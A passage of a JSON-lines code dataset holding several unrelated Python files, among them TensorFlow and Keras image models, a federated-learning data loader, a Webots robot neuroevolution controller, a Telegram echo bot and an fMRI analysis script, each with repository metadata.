'http://')\n\n # step 6\n self.check_macro_next_index(PWDstr, 'https://')\n\n # step 7\n self.check_macro_next_index(SAstr, 'https://')\n\n # step 8\n self.check_macro_next_index(PWDstr, 'tftp://')\n\n # step 9\n self.check_macro_next_index(SAstr, 'tftp://')\n\n log.info(\"End of test03_GPPa_UserPwd_GPPsa\")\n\n # ==================Group End Provision With Http & Tftp======\n\n\ndef main():\n tng.api.runner()\n\nif __name__ == '__main__':\n tng.run(main)\n","sub_path":"common/Provisioning/cmPROV_3pcc_provisioning_rule.py","file_name":"cmPROV_3pcc_provisioning_rule.py","file_ext":"py","file_size_in_byte":9931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"597617868","text":"import tensorflow as tf\nimport numpy as np\nimport os\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\nclass LeNet(tf.keras.Model):\n def __init__(self):\n super(LeNet, self).__init__()\n initializer = tf.initializers.GlorotUniform(seed=123)\n # Conv1\n self.wc1 = tf.Variable(initializer([3, 3, 3, 10]), trainable=True, name='wc1')\n \n # Conv2\n self.wc2 = tf.Variable(initializer([3, 3, 10, 20]), trainable=True, name='wc2')\n \n # Conv3\n self.wc3 = tf.Variable(initializer([3, 3, 20, 40]), trainable=True, name='wc3')\n \n # Flatten\n \n # Dense\n self.wd3 = tf.Variable(initializer([640, 280]), trainable=True)\n self.wd4 = tf.Variable(initializer([280, 80]), trainable=True) \n self.wd5 = tf.Variable(initializer([80, 10]), trainable=True)\n \n self.bc1 = tf.Variable(tf.zeros([10]), dtype=tf.float32, trainable=True)\n self.bc2 = tf.Variable(tf.zeros([20]), dtype=tf.float32, trainable=True)\n self.bc3 = tf.Variable(tf.zeros([40]), dtype=tf.float32, trainable=True)\n \n self.bd3 = tf.Variable(tf.zeros([280]), dtype=tf.float32, trainable=True)\n self.bd4 = tf.Variable(tf.zeros([80]), dtype=tf.float32, trainable=True) \n self.bd5 = tf.Variable(tf.zeros([10]), dtype=tf.float32, trainable=True) \n \n def call(self, x):\n # X = NHWC \n # Conv1 + maxpool 2\n x = tf.nn.conv2d(x, self.wc1, strides=[1, 1, 1, 1], padding=\"SAME\")\n x = tf.nn.bias_add(x, self.bc1)\n x = tf.nn.relu(x)\n x = tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding=\"SAME\")\n \n # Conv2 + maxpool 2\n x = tf.nn.conv2d(x, self.wc2, strides=[1, 1, 1, 1], padding=\"SAME\")\n x = tf.nn.bias_add(x, self.bc2)\n x = tf.nn.relu(x)\n x = tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding=\"SAME\")\n \n # Conv3 + maxpool 3\n x = tf.nn.conv2d(x, self.wc3, strides=[1, 1, 1, 1], padding=\"SAME\")\n x = tf.nn.bias_add(x, self.bc3)\n x = tf.nn.relu(x)\n x = tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding=\"SAME\")\n \n # Flattten out\n # N X Number of Nodes\n # Flatten()\n x = tf.reshape(x, (tf.shape(x)[0], -1))\n \n # Dense1\n x = tf.matmul(x, self.wd3)\n x = tf.nn.bias_add(x, self.bd3)\n x = tf.nn.relu(x)\n\n \n # Dense2\n x = tf.matmul(x, self.wd4)\n x = tf.nn.bias_add(x, self.bd4)\n x = tf.nn.relu(x)\n \n \n # Dense3\n x = tf.matmul(x, self.wd5)\n x = tf.nn.bias_add(x, self.bd5)\n# x = tf.nn.sigmoid(x)\n \n return x\n\ndef preprocess(image):\n image = tf.expand_dims(image, axis=0)\n image = tf.image.rgb_to_grayscale(image)\n image = tf.image.resize(image, (28, 28))\n image = tf.dtypes.cast(image, tf.float32)\n image = tf.image.per_image_standardization(image)\n return image\n\n\ndef predict_top_1(predictions):\n # model = tf.saved_model.load('../temp/models/')\n return tf.argmax(tf.nn.softmax(predictions), axis=1)\n\ndef predict_top_3(predictions):\n outputs = tf.math.top_k(tf.nn.softmax(predictions), k=3)\n\n top_k = []\n for confidences, indices in zip(outputs[0].numpy(), outputs[1].numpy()):\n single_sample = dict()\n for confidence, index in zip(confidences, indices):\n single_sample[index] = confidence\n top_k.append(single_sample)\n return top_k\n\n\nif __name__ == \"__main__\":\n model = LeNet()\n\n model_path = os.path.join(BASE_DIR, 'models', 'weights.h5')\n print(model_path)\n model.load_weights(model_path)\n","sub_path":"flask-deploy/architecture.py","file_name":"architecture.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"389502218","text":"import os\n\nfrom setuptools import setup, find_packages\nfrom opentb import VERSION, PACKAGE_NAME\n\n\n# Cannot create this list with pip.req.parse_requirements() because it requires\n# the pwd module, which is Unix only.\ndef _read_requirements(file_name):\n \"\"\"\n Returns list of required modules for 'install_requires' parameter. Assumes\n requirements file contains only module lines and comments.\n \"\"\"\n requirements = []\n with open(os.path.join(file_name)) as f:\n for line in f:\n if not line.startswith('#'):\n requirements.append(line.strip())\n return requirements\n\n\nINSTALL_REQUIREMENTS = _read_requirements('requirements.txt')\n\nSCRIPTS = ['opentb-cli', 'opentb-logger-cli']\n\n# read the contents of your README file\nthis_directory = os.path.abspath(os.path.dirname(__file__))\nwith open(os.path.join(this_directory, 'README.md')) as f:\n LONG_DESCRIPTION = f.read()\n\nsetup(\n name=PACKAGE_NAME,\n packages=find_packages(),\n python_requires='>3.8',\n include_package_data=True,\n install_requires=[INSTALL_REQUIREMENTS],\n scripts=SCRIPTS,\n version=VERSION,\n author='Francisco Molina',\n author_email='fjmolinas@gmail.com',\n description='',\n long_description_content_type='text/markdown',\n long_description=LONG_DESCRIPTION,\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.8',\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"10216255","text":"# Copyright 2020 Adap GmbH. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Partitioned versions of CIFAR-10/100 datasets.\"\"\"\n# pylint: disable=invalid-name\n\nfrom typing import Tuple\n\nimport tensorflow as tf\n\nfrom .dataset import (\n XY,\n PartitionedDataset,\n create_partitioned_dataset,\n log_distribution,\n)\n\n\ndef load_data(\n iid_fraction: float, num_partitions: int, cifar100: bool = False\n) -> Tuple[PartitionedDataset, XY]:\n \"\"\"Load partitioned version of CIFAR-10/100.\"\"\"\n cifar = tf.keras.datasets.cifar100 if cifar100 else tf.keras.datasets.cifar10\n (xy_train_partitions, xy_test_partitions), xy_test = create_partitioned_dataset(\n cifar.load_data(), iid_fraction, num_partitions\n )\n return (xy_train_partitions, xy_test_partitions), xy_test\n\n\nif __name__ == \"__main__\":\n # Load a partitioned dataset and show distribution of examples\n for _num_partitions in [10, 100]:\n for _fraction in [0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]:\n (xy_train_par, xy_test_par), _ = load_data(_fraction, _num_partitions)\n print(f\"\\nfraction: {_fraction}; num_partitions: {_num_partitions}\")\n log_distribution(xy_train_par)\n log_distribution(xy_test_par)\n","sub_path":"src/py/flwr_experimental/baseline/dataset/tf_cifar_partitioned.py","file_name":"tf_cifar_partitioned.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"162331830","text":"import select, socket, sys, queue\n\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.setblocking(0)\ns.bind((\"0.0.0.0\",5555))\ns.listen(5)\n\ni = [s]\no = []\n\nwhile i:\n r, w, e = select.select(i, o, [])\n print (\"Select\")\n print (r)\n for ss in r:\n if ss == s:\n cs, addr = s.accept()\n print (addr)\n i.append(cs) # pun cs in lista de socketuri\n print (i)\n else:\n print (ss.recv(20))\n\n for ss in e:\n ss.close()\n i.remove(ss)","sub_path":"Computer networks/Test prep/select_example.py","file_name":"select_example.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"48910663","text":"#!/usr/bin/env python3\n\nimport sys\nimport os\nimport argparse\nimport numpy as np\nimport tensorflow as tf\nimport json\nimport keras\n\nfrom keras.models import Sequential, Model, model_from_json\nfrom keras.layers import Dense, Flatten, Dropout, Input, concatenate, merge, Add, Dropout\nfrom keras.layers import Conv2D, Conv2DTranspose, Cropping2D, ZeroPadding2D, Activation\nfrom keras.layers import MaxPooling2D, UpSampling2D, Permute\nfrom keras import backend as K\nfrom keras.activations import softmax\nimport keras.backend.tensorflow_backend as tfb\nfrom keras.utils import plot_model\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.backend.tensorflow_backend import set_session\nfrom keras.optimizers import SGD,Adam\nfrom time import time\nfrom base_model import(BaseModel,sigmoid_cross_entropy_with_logits,\n image_accuracy,softmax_cross_entropy_with_logits)\n\n\n\ndef parse_args():\n \"\"\"\n function for argument parsing\n :return:\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--cache\", \"-c\", help=\"Cache data wherever possible\", action='store_true')\n parser.add_argument(\"--classification\", \"-t\", help=\"Cache data wherever possible\",\n default=4, type=int)\n parser.add_argument(\"--dataset\", \"-d\", help=\"dataset small or big\",\n default=\"big\", choices=[\"small\", \"big\"], type=str)\n parser.add_argument(\"--reload\", \"-r\", help=\"reload data\", action='store_true')\n parser.add_argument(\"--activation\", \"-a\", help=\"activation function for conv layers\",\n default=\"relu\")\n parser.add_argument(\"--log_level\", \"-l\", help=\"Set loglevel for debugging and analysis\",\n default=\"INFO\")\n args = parser.parse_args()\n return args\n\n\nclass RetinaDevModel(BaseModel):\n def __init__(self, classification=4, dataset=\"big\", reload=False, activation='relu', cache=True):\n super(RetinaDevModel, self).__init__(classification, dataset, reload, activation, cache)\n\n def create_model(self):\n print(self.activation)\n input_shape =(3, 565, 565)\n\n data_input = Input(shape=input_shape, name=\"data_input\")\n conv1_1 = Conv2D(64, kernel_size=(3, 3), activation=self.activation, name=\"conv1_1\",\n padding=\"SAME\")(data_input)\n conv1_1 = Dropout(0.2, name=\"Drop1_1\")(conv1_1)\n conv1_2 = Conv2D(64, kernel_size=(3, 3), activation=self.activation, name=\"conv1_2\",\n padding=\"SAME\")(conv1_1)\n conv1_2 = Dropout(0.2, name=\"Drop1_2\")(conv1_2)\n max_pool1 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='max_pool1',\n padding=\"SAME\")(conv1_2)\n\n # Convolution Layer 2\n conv2_1 = Conv2D(128, kernel_size=(3, 3), activation=self.activation, name=\"conv2_1\",\n padding=\"SAME\")(max_pool1)\n conv2_1 = Dropout(0.2, name=\"Drop2_1\")(conv2_1)\n conv2_2 = Conv2D(128, kernel_size=(3, 3), activation=self.activation, name=\"conv2_2\",\n padding=\"SAME\")(conv2_1)\n conv2_2 = Dropout(0.2, name=\"Drop2_2\")(conv2_2)\n max_pool2 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='max_pool2',\n padding=\"SAME\")(conv2_2)\n\n # Convolution Layer3\n conv3_1 = Conv2D(256, kernel_size=(3, 3), activation=self.activation, name=\"conv3_1\",\n padding=\"SAME\")(max_pool2)\n conv3_1 = Dropout(0.2, name=\"Drop3_1\")(conv3_1)\n conv3_2 = Conv2D(256, kernel_size=(3, 3), activation=self.activation, name=\"conv3_2\",\n padding=\"SAME\")(conv3_1)\n conv3_2 = Dropout(0.2, name=\"Drop3_2\")(conv3_2)\n conv3_3 = Conv2D(256, kernel_size=(3, 3), activation=self.activation, name=\"conv3_3\",\n padding=\"SAME\")(conv3_2)\n conv3_3 = Dropout(0.2, name=\"Drop3_3\")(conv3_3)\n max_pool3 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='max_pool3',\n padding=\"SAME\")(conv3_3)\n\n # Convolution Layer4\n conv4_1 = Conv2D(512, kernel_size=(3, 3), activation=self.activation, name=\"conv4_1\",\n padding=\"SAME\")(max_pool3)\n conv4_1 = Dropout(0.2, name=\"Drop4_1\")(conv4_1)\n conv4_2 = Conv2D(512, kernel_size=(3, 3), activation=self.activation, name=\"conv4_2\",\n padding=\"SAME\")(conv4_1)\n conv4_2 = Dropout(0.2, name=\"Drop4_2\")(conv4_2)\n conv4_3 = Conv2D(512, kernel_size=(3, 3), activation=self.activation, name=\"conv4_3\",\n padding=\"SAME\")(conv4_2)\n conv4_3 = Dropout(0.2, name=\"Drop4_3\")(conv4_3)\n\n conv5_1 = Conv2D(64, kernel_size=(5, 5), activation=self.activation, name=\"conv5_1\",\n padding=\"SAME\")(max_pool1)\n conv5_1 = Dropout(0.2, name=\"Drop5_1\")(conv5_1)\n conv5_2 = Conv2D(64, kernel_size=(5, 5), activation=self.activation, name=\"conv5_2\",\n padding=\"SAME\")(conv5_1)\n conv5_2 = Dropout(0.2, name=\"Drop5_2\")(conv5_2)\n max_pool4 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='max_pool4',\n padding=\"SAME\")(conv5_2)\n\n # Convolution Layer 2\n conv6_1 = Conv2D(128, kernel_size=(5, 5), activation=self.activation, name=\"conv6_1\",\n padding=\"SAME\")(max_pool4)\n conv6_1 = Dropout(0.2, name=\"Drop6_1\")(conv6_1)\n conv6_2 = Conv2D(128, kernel_size=(5, 5), activation=self.activation, name=\"conv6_2\",\n padding=\"SAME\")(conv6_1)\n conv6_2 = Dropout(0.2, name=\"Drop6_2\")(conv6_2)\n max_pool5 = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), name='max_pool5',\n padding=\"SAME\")(conv6_2)\n\n #\n conv1_2_16 = Conv2D(16, kernel_size=(3, 3), name=\"conv1_2_16\",\n padding=\"SAME\")(conv1_2)\n conv1_2_16 = Dropout(0.2, name=\"Drop1_2_16\")(conv1_2_16)\n conv2_2_16 = Conv2D(16, kernel_size=(3, 3), name=\"conv2_2_16\",\n padding=\"SAME\")(conv2_2)\n conv2_2_16 = Dropout(0.2, name=\"Drop2_2_16\")(conv2_2_16)\n conv3_3_16 = Conv2D(16, kernel_size=(3, 3), name=\"conv3_3_16\",\n padding=\"SAME\")(conv3_3)\n conv3_3_16 = Dropout(0.2, name=\"Drop3_3_16\")(conv3_3_16)\n conv4_3_16 = Conv2D(16, kernel_size=(3, 3), name=\"conv4_3_16\",\n padding=\"SAME\")(conv4_3)\n conv4_3_16 = Dropout(0.2, name=\"Drop4_3_16\")(conv4_3_16)\n\n conv5_2_16 = Conv2D(16, kernel_size=(5, 5), name=\"conv5_2_16\",\n padding=\"SAME\")(conv5_2)\n conv5_2_16 = Dropout(0.2, name=\"Drop5_2_16\")(conv5_2_16)\n conv6_2_16 = Conv2D(16, kernel_size=(5, 5), name=\"conv6_2_16\",\n padding=\"SAME\")(conv6_2)\n conv6_2_16 = Dropout(0.2, name=\"Drop6_2_16\")(conv6_2_16)\n\n # Deconvolution Layer1\n side_multi2_up = UpSampling2D(size=(2, 2), name=\"side_multi2_up\")(conv2_2_16)\n\n upside_multi2 = Cropping2D(cropping=((0, 1),(0, 1)), name=\"upside_multi2\")(side_multi2_up)\n\n # Decovolution Layer2\n side_multi3_up = UpSampling2D(size=(4, 4), name=\"side_multi3_up\")(conv3_3_16)\n upside_multi3 = Cropping2D(cropping=((1, 2),(1, 2)), name=\"upside_multi3\")(side_multi3_up)\n\n # Deconvolution Layer3\n side_multi4_up = UpSampling2D(size=(8, 8), name=\"side_multi4_up\")(conv4_3_16)\n upside_multi4 = Cropping2D(cropping=((1, 2),(1, 2)), name=\"upside_multi4\")(side_multi4_up)\n\n # Deconvolution Layer4\n side_multi5_up = UpSampling2D(size=(2, 2), name=\"side_multi5_up\")(conv5_2_16)\n\n upside_multi5 = Cropping2D(cropping=((0, 1),(0, 1)), name=\"upside_multi5\")(side_multi5_up)\n\n # Deconvolution Layer1\n side_multi6_up = UpSampling2D(size=(4, 4), name=\"side_multi6_up\")(conv6_2_16)\n\n upside_multi6 = Cropping2D(cropping=((1, 2),(1, 2)), name=\"upside_multi6\")(side_multi6_up)\n\n # Specialized Layer\n concat_upscore = concatenate([conv1_2_16, upside_multi2, upside_multi3, upside_multi4,\n upside_multi5, upside_multi6],\n name=\"concat-upscore\", axis=1)\n upscore_fuse = Conv2D(self._classification, kernel_size=(1, 1), name=\"upscore_fuse\")(concat_upscore)\n upscore_fuse = Dropout(0.2, name=\"Dropout_Classifier\")(upscore_fuse)\n # upscore_fuse = Activation('sigmoid')(upscore_fuse)\n\n self.model = Model(inputs=[data_input], outputs=[upscore_fuse])\n\n def set_weights(self):\n if self.cache and os.path.exists(\"cache/keras_crop_model_weights_4class_dev_reg_relu.h5\"):\n print(\"yes\")\n # self.model.set_weights(\"cache/keras_crop_model_weights_4class_dev2_reg_relu.h5\")\n # return\n with open(\"cache/dev2_model.json\") as f:\n dev_model = model_from_json(json.dumps(json.load(f)))\n dev_model.load_weights(\"cache/keras_crop_model_weights_4class_dev2_reg_relu.h5\")\n \n for dev_layer, layer in zip(dev_model.layers, self.model.layers):\n try:\n layer.set_weights(dev_layer.get_weights())\n except:\n print(layer.name)\n # self.model.save_weights(os.path.join('cache',\n # 'keras_crop_model_weights_4class_dev2_reg_{}.h5'.format(\n # self.activation)))\n\n def fit(self):\n print(self.train_images.shape)\n sgd = SGD(lr=1e-9, decay=1e-4, momentum=0.9, nesterov=True)\n weight_save_callback = keras.callbacks.ModelCheckpoint('/cache/checkpoint_weights.h5', monitor='val_loss',\n verbose=0, save_best_only=True, mode='auto')\n tb_callback = keras.callbacks.TensorBoard(log_dir='./Graph/{}/'.format(time()), histogram_freq=200,\n write_graph=True, write_images=False)\n\n self.model.compile(optimizer=sgd, loss=sigmoid_cross_entropy_with_logits,\n metrics=[ image_accuracy])\n\n self.model.fit(self.train_images, self.train_labels, batch_size=5, epochs=5000,\n callbacks=[tb_callback], validation_split=0.005, verbose=2)\n\n self.model.save_weights(os.path.join('cache', \n 'keras_crop_model_weights_4class_dev2_reg_{}.h5'.format(self.activation)))\n \n def predict(self, data):\n self.test_predict = self.model.predict(data, batch_size=10)\n print(self.test_predict[0])\n print(self.test_predict.shape)\n np.save('cache/test_predict2_class_4_dev2_{}.npy'.format(self.activation), self.test_predict)\n\n\nif __name__ == '__main__':\n args = parse_args()\n config = tf.ConfigProto ()\n config.gpu_options.visible_device_list = \"0\"\n set_session (tf.Session (config=config))\n rm = RetinaDevModel(classification=args.classification, dataset=args.dataset,\n reload=args.reload, activation=args.activation, cache=args.cache)\n rm.create_model()\n rm.set_weights()\n rm.get_data()\n print(rm.test_labels.shape)\n print(rm.train_images.shape)\n rm.run()\n # rm.predict(data=rm.test_images)\n K.clear_session()\n","sub_path":"python/dev2_model.py","file_name":"dev2_model.py","file_ext":"py","file_size_in_byte":11486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"246890226","text":"from functools import wraps\nimport logging\nimport os\n\n# A special helper to add logging\n\nLOG_FILE = 'hw2.log'\nAPP_NAME = 'hw2'\n\nos.remove(LOG_FILE)\n\nlogger = logging.getLogger(APP_NAME)\nlogger.setLevel(logging.DEBUG)\n# create file handler which logs even debug messages\nfh = logging.FileHandler(LOG_FILE)\nfh.setLevel(logging.DEBUG)\n# create console handler with a higher log level\nch = logging.StreamHandler()\nch.setLevel(logging.ERROR)\n# create formatter and add it to the handlers\nformatter = logging.Formatter('%(asctime)s - %(name)s - '\n '%(levelname)s - %(message)s')\nfh.setFormatter(formatter)\nch.setFormatter(formatter)\n# add the handlers to the logger\nlogger.addHandler(fh)\nlogger.addHandler(ch)\n\n\n# a decorator to add a debug logging of any function execution\ndef add_debug(func):\n @wraps(func)\n def wrapper(self, *argc, **kargc):\n logger.debug(f'{self.__class__.__name__} '\n f'method with name {func.__name__} at {func} invoked')\n res = func(self, *argc, **kargc)\n return res\n return wrapper\n","sub_path":"hw2/helpers/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"131369179","text":"\"\"\"epuck_collector controller.\"\"\"\n\n# You may need to import some classes of the controller module. Ex:\n# from controller import Robot, Motor, DistanceSensor\nfrom typing import Callable\nfrom controller import Camera, Motor, Robot, Receiver\nimport msgpack\nimport logging as log\n\nimport torch.nn as nn\nimport torch\nimport numpy as np\nimport random\n\n# create the Robot instance.\nrobot = Robot()\n\n# get the time step of the current world.\ntimestep = 128\n\ndef build_model():\n ffmlp = nn.Sequential(\n nn.Conv2d(3, 8, 3,stride=2),\n nn.ReLU(),\n nn.Conv2d(8, 16, 3,stride=2),\n nn.ReLU(),\n nn.Flatten(),\n nn.Linear(1728, 2),\n nn.Tanh(),\n )\n for param in ffmlp.parameters():\n param.requires_grad = False\n return ffmlp.cuda()\n\n\nclass indi:\n \"\"\"individium class\"\"\"\n\n def __init__(self, func: Callable):\n \"\"\"init individum with random x,y in [-2,2]\n\n Args:\n func (Callable): fitness funciton taking x,y params\n\n \"\"\"\n self.w = build_model()\n self.fitness = func\n self.last_fitness = 0\n\n def eval(self) -> float:\n \"\"\"evaluate fitness of this individuum\n\n Returns:\n [float]: fitness score (higher better)\n \"\"\"\n self.last_fitness = self.fitness(self.w)\n return self.last_fitness\n\n def mutate(self, sigma=0.1):\n \"\"\"mutate by drawing from ndist around current value with sigma\"\"\"\n for p in self.w.parameters():\n p += torch.randn_like(p)/100\n\ndef xover(a: indi, b: indi) -> indi:\n \"\"\"crossover between two individuals by randomly-weighted linear interpolation between their respective coefficients\n\n Args:\n a (indi): parent a\n b (indi): parent b\n\n Returns:\n indi: child c\n \"\"\"\n c = indi(fittness_eval)\n \n for p in zip(c.w.parameters(), a.w.parameters(), b.w.parameters()):\n rel = torch.rand_like(p[0].data).cuda()\n p[0].data.copy_(rel * p[1].data + (1 - rel) * p[2].data)\n return c\n\n\n\nrec: Receiver = robot.getDevice(\"receiver\")\nrec.enable(timestep)\ncamera: Camera = robot.getDevice(\"camera\")\ncamera.enable(timestep)\nlog.basicConfig(\n level=log.INFO, format=\"%(asctime)s %(filename)s %(levelname)s: %(message)s\"\n)\n\nmotorLeft:Motor = robot.getDevice('left wheel motor')\nmotorRight:Motor = robot.getDevice('right wheel motor')\nmotorLeft.setPosition(float('inf')) #this sets the motor to velocity control instead of position control\nmotorRight.setPosition(float('inf'))\nmotorLeft.setVelocity(0)\nmotorRight.setVelocity(0)\n\n\ndef fittness_eval(model, do_inf=False):\n points = 0\n balls_collected = 0\n startTime = int(robot.getTime()) \n while robot.step(timestep) != -1:\n # Read the sensors:\n # Enter here functions to read sensor data, like:\n # val = ds.getValue()\n if do_inf == False:\n theTime = robot.getTime() - startTime\n if theTime > 60*10 or (balls_collected/(1+theTime) < 1/60 and theTime > 60*3):\n reward = points + balls_collected/30.0\n print(f\"finished with {balls_collected} points after {int(theTime/60)} minutes\")\n return balls_collected\n imgBytes = camera.getImage()\n with torch.no_grad():\n image = (\n torch.from_numpy(\n np.frombuffer(imgBytes, np.uint8).reshape(\n (camera.getHeight(), camera.getWidth(), 4)\n )[:, :, :3]\n / 255.0\n )\n .float()\n .permute(2, 0, 1)\n .unsqueeze(0)\n .cuda()\n )\n motorSignal = model.forward(image)[0].cpu().numpy()\n\n\n \n motorRight.setVelocity(motorSignal[0]*motorRight.getMaxVelocity())\n motorLeft.setVelocity(motorSignal[1]*motorLeft.getMaxVelocity())\n # Process sensor data here.\n\n # Enter here functions to send actuator commands, like:\n # motor.setPosition(10.0)\n while rec.getQueueLength() > 0:\n msg_dat = rec.getData()\n rec.nextPacket()\n msg = msgpack.unpackb(msg_dat)\n points += int(msg[\"value\"])\n balls_collected += 1\n\n\n#%% run it\npopsize = 50\nmaxgen = 500\nuse_elitism = True\nallow_self_reproduction = True\npop = [indi(fittness_eval) for i in range(popsize*2)]\npop[0].w = torch.load(\"best.pkl\")\nfor gen in range(maxgen):\n pop.sort(key=lambda p0: p0.eval(), reverse=True)\n best = pop[0]\n print(f\"{gen}: fitness: {best.last_fitness} avg: {np.average([p.last_fitness for p in pop])}\")\n torch.save(best.w, \"best.pkl\")\n\n # cross over top 10 indis of old pop\n pop = pop[0:10]\n new_pop = []\n for a in pop:\n for b in pop:\n if allow_self_reproduction == False and a == b:\n continue\n new_ind = xover(a, b)\n new_ind.mutate()\n new_pop.append(new_ind)\n random.shuffle(new_pop)\n new_pop = new_pop[0:popsize]\n if use_elitism:\n pop = pop[0:1] + new_pop\n else:\n pop = new_pop","sub_path":"webots/controllers/epuck_collector/epuck_collector.py","file_name":"epuck_collector.py","file_ext":"py","file_size_in_byte":5094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"575189926","text":"import logging\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters\nlogging.basicConfig(filename='bot.log', level=logging.INFO)\n\nimport settings\n#настройка прокси\n# PROXY = {'proxy_url': 'socks5://t3.learn.python.ru:1080',\n# 'urllib3_proxy_kwargs':{'username': 'learn', 'password': 'python'}}\n\ndef greet_user(update, context):\n print('Вызван /start')\n update.message.reply_text('Привет пользователь! ты вызвал команду /start')\ndef talk_to_me(update, context):\n text = update.message.text\n print(text)\n update.message.reply_text(text)\ndef main():\n #Создаем бота и передаем ему ключ для авторизации на серверахтелеграмм\n mybot = Updater(settings.API_KEY, use_context=True)\n #, request_kwargs=PROXY)\n dp=mybot.dispatcher\n dp.add_handler(CommandHandler(\"start\", greet_user))\n dp.add_handler(MessageHandler(Filters.text, talk_to_me))\n logging.info('Бот стартовал')\n #Камандуем бота ходиить в телеграмм за сообщениями\n mybot.start_polling()\n #Запускаем бота, он будет работать пока мы его не остановим принудительно\n mybot.idle()\nif __name__== \"__main__\": \n main()","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"79903989","text":"import sys\nimport os\n\nroot = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nif root not in sys.path:\n sys.path.append(root)\n\n\nfrom utilities.settings import Subjects, Paths, Params\nfrom utilities.utils import get_output_parent_folder, get_path2output\nfrom models.english.LSTM.tokenizer import tokenize\n\nfrom itertools import combinations, product\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg')\n\nimport numpy as np\nimport nilearn\nfrom nilearn.image import load_img, mean_img, index_img, threshold_img, math_img\nfrom nilearn import datasets\nfrom nilearn.input_data import NiftiMapsMasker, NiftiMasker, NiftiLabelsMasker\nfrom nilearn.regions import RegionExtractor\nfrom utilities.utils import get_data, get_output_parent_folder, check_folder, transform_design_matrices, pca\n\nfrom joblib import Parallel, delayed\nimport yaml\nimport pandas as pd\nimport argparse\nfrom textwrap import wrap \n\nimport warnings\nwarnings.simplefilter(action='ignore')\n\nparams = Params()\npaths = Paths()\n\n\nif __name__ == '__main__':\n\n ###########################################################################\n ####################### Loading Yaml and parameters #######################\n ###########################################################################\n\n parser = argparse.ArgumentParser(description=\"\"\"Objective:\\nAnalysis of the fMRI pipeline.\"\"\")\n parser.add_argument(\"--path_yaml\", default=None, help=\"Path to the yaml file with the models to compare.\")\n parser.add_argument(\"--analysis\", nargs='+', default=[], action='append', help='Analysis to perform.')\n parser.add_argument(\"--default_mask\", default=os.path.join(paths.path2data, 'fMRI', 'english', 'sub-057', 'func', 'fMRI_english_sub-057_run1.nii.nii'), help='fMRI data to construct a global mask.')\n\n args = parser.parse_args()\n\n with open(args.path_yaml, 'r') as stream:\n try:\n analysis_parameters = yaml.safe_load(stream)\n except yaml.YAMLError as exc:\n print(exc)\n\n subjects = analysis_parameters['subjects']\n source = analysis_parameters['source']\n language = analysis_parameters['language']\n\n i = 0\n\n #paths.path2derivatives = '/Users/alexpsq/Code/NeuroSpin/LePetitPrince/derivatives' # to delete\n #paths.path2data = '/Users/alexpsq/Code/NeuroSpin/LePetitPrince/data'\n\n\n ###########################################################################\n ############################## Scatter plots ##############################\n ###########################################################################\n \n if 'scatter_plots' in args.analysis[0]:\n # retrieve default atlas (= set of ROI)\n atlas = datasets.fetch_atlas_harvard_oxford(params.atlas)\n labels = atlas['labels']\n maps = nilearn.image.load_img(atlas['maps'])\n\n # extract data\n for index_mask in range(len(labels)-1):\n mask = math_img('img > 50', img=index_img(maps, index_mask)) \n masker = NiftiMasker(mask_img=mask, memory='nilearn_cache', verbose=5)\n masker.fit()\n for analysis in analysis_parameters['scatter_plots']:\n for subject in subjects:\n subject = Subjects().get_subject(int(subject))\n model1 = [os.path.join(paths.path2derivatives, source, analysis['input_data_folder1'], language, analysis['model1_folder'], analysis['model1']+ '_' + subject + '.nii.gz')]\n model2 = [os.path.join(paths.path2derivatives, source, analysis['input_data_folder2'], language, analysis['model2_folder'], analysis['model2'] + '_' + subject + '.nii.gz')]\n analysis_name = analysis['name']\n x = masker.transform(model1) # you should include confounds\n y = masker.transform(model2)\n\n # save plots\n plt.figure(i)\n plt.scatter(x, y, c='red', marker='.')\n plt.scatter([np.mean(x)], 